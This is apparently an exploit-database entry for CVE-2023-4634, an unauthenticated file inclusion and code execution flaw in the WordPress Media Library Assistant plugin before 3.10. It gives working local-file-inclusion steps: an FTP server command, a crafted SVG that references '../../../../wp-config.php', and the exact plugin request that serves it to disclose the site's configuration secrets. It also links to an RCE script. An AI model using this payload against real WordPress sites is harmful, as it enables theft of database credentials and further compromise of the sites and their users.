Exploit for Media Library Assistant < 3.10 - Unauthenticated Local/Remote File Inclusion & Remote Code Execution CVE-2023-4634

Name: Exploit for Media Library Assistant < 3.10 - Unauthenticated Local/Remote File Inclusion & Remote Code Execution CVE-2023-4634
Rating: 5 (3 reviews)

2023-09-07 | CVSS 7.5

## https://sploitus.com/exploit?id=WPEX-ID:E07091B7-2168-4DA3-8CF3-7669F0DD823D
LFI:

1. Set up a local FTP server. This may be done using python as follows:

python3 -m pyftpdlib -p 2122

2. Add files `lfi.svg` and `lfi.svg[0]` with the following content:

<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:../../../../wp-config.php" width="500" height="500" />
</svg>

3. Ensure that ImageMagick on the server supports the SVG format (`identify -list format | grep -i svg`).

4. Visit `/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://FTP_SERVER:FTP_PORT/lfi.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600` with correct values of FTP_SERVER and FTP_PORT to view the contents of the `wp-config.php` file.

RCE:

See full details on in the blog post, and the exploit script on Github:

- https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
- https://github.com/Patrowl/CVE-2023-4634/